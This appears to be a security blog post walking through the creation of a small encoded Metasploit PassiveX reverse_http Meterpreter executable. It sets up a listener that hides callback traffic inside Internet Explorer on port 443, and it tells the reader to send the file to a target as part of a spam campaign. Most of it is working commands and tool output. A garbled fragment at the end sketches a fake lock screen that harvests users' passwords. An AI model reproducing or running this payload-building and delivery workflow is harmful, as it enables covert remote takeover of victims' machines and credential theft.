I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the IExpress “hack” would make for an very hard to spot payload.
A really down and dirty explination of what PassiveX is and why it’s useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back. So someone looking for a rogue process will only see Internet Explorer open and talking over port 443 (as specified).
(props to skape for writting PassiveX and @_natron_ for kicking in the latest tweaks to make it work with IE7/IE8)
Here are the options for msfpayload:
Usage: ./msfpayload <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>
And msfencode’s options if you chose to use it as I demonstrate below. However, encoding happens by default with msfpayload (IIRC):
./msfencode -h
Usage: ./msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: ‘\x00\xff’
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba)
Here we create the PassiveX payload. Note the PX options instead of the LHOST/LPORT:
./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100 PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe
[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)
Now that we have our "malicious payload" in /tmp we get our listener ready (you can use msfcli as well, I just like msfconsole because it provides me more flexibility):
./msfconsole
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux
msf > use multi/handler
msf exploit(handler) > exploit -h
(I'm showing you 'exploit's options because a lot of people don't know they exist. With two lines you can start your listener (use, then exploit):
Usage: exploit [options]
Launches an exploitation attempt.
OPTIONS:
-e <opt> The payload encoder to use. If none is specified, ENCODER is used.
-h Help banner.
-j Run in the context of a job.
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is used.
-z Do not interact with the session after successful exploitation.
msf exploit(handler) > exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=0.0.0.0,PXPORT=443,PXURI=/,ExitOnSession=False
[*] Exploit running as background job.
[*] PassiveX listener started.
[*] Starting the payload handler…
msf exploit(handler) >
Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just send off maliciouspayload.exe to your target and you’re set.
”) and then allows them back in, capturing those password. (Usually a user will try a couple different passwords so you might be able to glean other credentials to use). It could also have an option to state. “Account Locked, You must be an Administrator to login” so that they call an admin in to unlock it 
